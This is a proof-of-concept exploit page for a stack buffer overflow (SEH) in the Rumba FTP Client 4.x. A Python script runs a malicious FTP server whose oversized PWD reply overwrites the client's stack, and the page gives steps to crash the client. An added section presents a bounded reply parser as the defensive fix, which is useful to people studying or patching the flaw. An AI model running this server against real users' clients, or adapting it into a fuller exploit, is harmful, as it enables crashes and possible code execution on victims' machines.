PoC Rumba FTP Client 4.x – Stack buffer overflow (SEH) Exploit

Run the following script:

Source: http://0day.today/exploit/26172

Download: Vulnerable app – http://nadownloads.microfocus.com/epd/product_download_request.aspx?type=eval&transid=2179441&last4=2179441&code=40307

```python
import socket
import sys
import time

# Requires Python 3: all socket data is handled as bytes.

# IP address the fake FTP server listens on
IP = '127.0.0.1'

# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

# Bind the socket to the port
server_address = (IP, 21)
print("Starting up on %s port %s" % server_address)
sock.bind(server_address)

# Listen for incoming connections
sock.listen(1)

# Wait for incoming connection
while True:
    print("Waiting for a connection")
    connection, client_address = sock.accept()

    try:
        print("Connection from " + str(client_address))
        # Greet the client, then answer each command it sends
        connection.send(b"220 Welcome\r\n")

        while True:
            data = connection.recv(16)
            if not data:
                # Client closed the control connection
                break
            print("received %s" % data)
            if b"USER" in data:
                print("Sending 331")
                connection.send(b"331 Please specify the password.\r\n")
            if b"PASS" in data:
                print("Sending 230")
                connection.send(b"230 Login successful.\n\n")
            if b"PWD" in data:
                print("Sending 257")

                # 77A632E2 add esp,908 pop pop pop ret
                # THIS IS THE PART WHERE THE OVERFLOW HAPPENS
                connection.send(b"257 \"/" + b"A" * 629 + b"\x45\x45\x45\x45" + b"\x44\x44\x44\x44" + b"D" * 185 + b"rrrr" + b"D" * 211 + b"\"\r\n")
            if b"TYPE A" in data:
                print("Sending 200 Switching to ASCII mode.")
                connection.send(b"200 Switching to ASCII mode.\r\n")
            if b"TYPE I" in data:
                print("Sending 200 Switching to Binary mode.")
                connection.send(b"200 Switching to Binary mode.\r\n")
            if b"SYST" in data:
                print("Sending 215")
                connection.send(b"215 UNIX Type: L8\r\n")

            if b"SIZE" in data:
                print("Sending 200")
                connection.send(b"200 Switching to Binary mode. \r\n")

            if b"FEAT" in data:
                print("Sending 211-Features")
                connection.send(b"211-Features:\r\n EPRT\r\n EPSV\r\n MDTM\r\n PASV\r\n REST STREAM\r\n SIZE\r\n TVFS\r\n211 End\r\n")
            if b"CWD" in data:
                print("Sending 250 Directory successfully changed.")
                connection.send(b"250 Directory successfully changed.\r\n")

            if b"PASV" in data:
                # The address/port pair is hard-coded: 111*256+183 = 28599, and the
                # four host octets must be the address of the machine running this
                # script or the client will not reach the data socket.
                print("Sending 227 Entering Passive Mode (130,161,45,252,111,183)\n\n")
                connection.send(b"227 Entering Passive Mode (130,161,45,252,111,183)\n\n")

                # Listen on a new socket for the data connection
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                print('Socket created')

                # Bind socket to local host and port
                try:
                    s.bind((IP, 28599))
                except socket.error as msg:
                    print('Bind failed. Error Code : ' + str(msg.errno) + ' Message ' + str(msg.strerror))
                    sys.exit()

                print('Socket bind complete for PASV on port 28599')

                # Start listening on socket
                s.listen(10)
                print('Socket now listening on 28599')

                # Wait to accept a connection - blocking call
                conn, addr = s.accept()
                print('Connected with ' + addr[0] + ':' + str(addr[1]))
                time.sleep(1)
                print("Sending dir list")
                connection.send(b"150 Here comes the directory listing.\r\n")
                conn.send(b"d" * 500 + b"rwx------ 2 500 500 4096 Nov 05 2007 " + b"A." + b"B" * 500 + b"\r\n")

                # Send ok to ftp client
                connection.send(b"226 Directory send OK.\r\n")

                # Close the data connection
                s.close()
                conn.close()
                break

            if b"EXIT" in data:
                print("REC")
                connection.send(b"Have a nice day!\r\n")
                break
    finally:
        connection.close()
```
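The crash the script provokes comes from the client copying the quoted pathname of the 257 reply into a fixed-size stack buffer without checking its length. The Python 3 parser below is an added example, not code from this page or from the Rumba client, showing the check a client must make before storing that path: it decodes the RFC 959 quoted pathname (a doubled quote stands for a literal quote) and rejects the reply as soon as the path grows past a limit, so an over-long path is never buffered in full. The 260-byte limit is an assumed, illustrative value (Windows MAX_PATH), not the Rumba client's real buffer size, and the sample replies are constructed inline; the oversized one has the same shape as the reply the script above sends.

```python
# Added example: bounded parsing of an FTP 257 (PWD) reply.
# MAX_PATH_LEN is an assumed, illustrative limit (Windows MAX_PATH); the real
# Rumba client's buffer size is not known from the page.
MAX_PATH_LEN = 260


def parse_pwd_reply(reply, max_len=MAX_PATH_LEN):
    """Return the pathname carried by a 257 reply, as bytes.

    RFC 959 writes the pathname in double quotes and doubles any quote that
    appears inside it.  The path is copied byte by byte and the length check
    runs before each byte is stored, so an over-long path is rejected without
    ever being buffered in full.  ValueError signals a malformed or oversized
    reply; a client should then drop the connection rather than use the path.
    """
    if not reply.startswith(b'257 "'):
        raise ValueError("not a quoted-pathname 257 reply")
    path = bytearray()
    i = 5                      # first byte after the opening quote
    n = len(reply)
    while i < n:
        c = reply[i:i + 1]
        if c == b'"':
            if reply[i + 1:i + 2] == b'"':
                i += 1         # doubled quote: keep a single literal quote
            else:
                return bytes(path)   # closing quote: pathname complete
        if len(path) >= max_len:
            raise ValueError("pathname exceeds %d bytes" % max_len)
        path += c
        i += 1
    raise ValueError("unterminated pathname")


def pwd_reply_is_safe(reply, max_len=MAX_PATH_LEN):
    """Boolean wrapper for a proxy or detector that inspects server replies."""
    try:
        parse_pwd_reply(reply, max_len)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed sample replies.
    benign = b'257 "/home/user" is current directory.\r\n'
    quoted = b'257 "/tmp/a""b"\r\n'
    # Same shape as the reply the PoC server sends: a quoted path far longer
    # than any fixed buffer (1038 bytes here).
    oversized = b'257 "/' + b"A" * 1037 + b'"\r\n'
    print(parse_pwd_reply(benign))          # b'/home/user'
    print(parse_pwd_reply(quoted))          # b'/tmp/a"b'
    print(pwd_reply_is_safe(oversized))     # False
```

The point of checking the length inside the copy loop rather than after it is that the check then holds for any input size: the client never needs more memory than the buffer it already has, and a hostile server gets a closed connection instead of control over the stack.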

After that, install the vulnerable program and run it.


In the Address field, enter the IP address of the machine running the Python script above, then click Go.

After a few moments the Rumba FTP client enters a crashed (not responding) state, as shown in the following screenshot.
